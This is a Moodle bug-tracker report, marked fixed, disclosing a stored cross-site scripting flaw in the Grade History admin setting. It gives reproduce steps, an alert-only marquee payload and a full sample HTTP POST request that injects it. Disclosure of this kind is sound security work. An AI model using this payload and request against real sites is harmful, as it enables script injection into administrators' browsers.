-
Bug
-
Resolution: Fixed
-
Minor
-
3.7.4, 3.8.1, 3.9
-
MOODLE_37_STABLE, MOODLE_38_STABLE, MOODLE_39_STABLE
-
MOODLE_37_STABLE, MOODLE_38_STABLE
-
MDL-68061-master -
-
International 3.9 - Sprint 6
The application is vulnerable to Stored Cross-Site Scripting (XSS) attack. You can find reproduce steps and sample HTTP Request below.
Tested Moodle version: 3.8.1+ (the latest)
Tested browser version: Firefox 73.0.1
Vulnerable parameter: 's__grade_report_historyperpage' on Grade History Module (/admin/settings.php?section=gradereporthistory)
Tested payload: <marquee loop=1 width=0 onfinish=alert('Stored-XSS-Test')>
Reproduce steps:
1- Go to 'Grade History' module (/admin/settings.php?section=gradereporthistory)
2- Change the HTTP Post Request's 's__grade_report_historyperpage' parameter with said payload(HTTP Request is attached below).
3- Go to any log pages to observe the execution, e.g. 'Live logs' page (report/loglive/index.php)
Sample HTTP Request:
POST /admin/settings.php?section=gradereporthistory HTTP/1.1 |
Host: <REDACTED>
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 |
Accept-Language: en-GB,en;q=0.5 |
Accept-Encoding: gzip, deflate
|
Content-Type: application/x-www-form-urlencoded
|
Content-Length: 182 |
Origin: <REDACTED>
|
DNT: 1 |
Connection: close
|
Referer: https://<REDACTED>/admin/settings.php?section=gradereporthistory |
Cookie: MoodleSession=4i<REDACTED>gr
|
Upgrade-Insecure-Requests: 1 |
section=gradereporthistory&action=save-settings&sesskey=Cr<REDACTED>id&return=&s__grade_report_historyperpage=%3Cmarquee+loop%3D1+width%3D0+onfinish%3Dalert%28%27Stored-XSS-Test%27%29%3E |
|